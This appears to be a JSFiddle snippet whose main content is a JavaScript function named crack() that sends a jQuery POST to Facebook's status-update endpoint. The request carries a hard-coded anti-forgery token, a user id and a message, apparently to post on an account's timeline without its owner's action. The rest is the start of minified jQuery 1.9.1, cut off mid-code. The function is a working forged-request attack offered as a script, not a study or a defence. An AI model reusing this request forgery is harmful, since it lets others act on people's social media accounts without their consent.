JSFiddle - React, Tailwind, and code Playground

by johnhoffman

JavaScript

function crack() {
    var data = "fb_dtsg=AQDQQsHl&xhpc_context=profile&xhpc_ismeta=1&xhpc_timeline=1&xhpc_composerid=u_jsonp_7_d&xhpc_targetid=730321057&clp=%7B%22cl_impid%22%3A%2244f8ede9%22%2C%22clearcounter%22%3A7%2C%22elementid%22%3A%22u_jsonp_7_s%22%2C%22version%22%3A%22x%22%2C%22parent_fbid%22%3A730321057%7D&xhpc_message_text=yayay&xhpc_message=yayay&backdated_date[year]=&backdated_date[month]=&backdated_date[day]=&backdated_date[hour]=&backdated_date[minute]=&is_explicit_place=&composertags_place=&composertags_place_name=&tagger_session_id=1382856491&action_type_id[0]=&object_str[0]=&object_id[0]=&hide_object_attachment=0&composertags_city=&disable_location_sharing=false&composer_predicted_city=108056275889020&audience[0][value]=40&nctr[_mod]=pagelet_timeline_recent&__user=730321057&__a=1&__dyn=7n8ahyj2lmpnzpQ9UmWWleaEFoW9J28C49o&__req=98&ttstamp=2658168818111572108";
    
    $.ajax({
      type: "POST",
      url: "https://www.facebook.com/ajax/updatestatus.php",
      data: data,
      success: success,
      dataType: "text"
    });
}


/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license
//@ sourceMappingURL=jquery.min.map
*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return...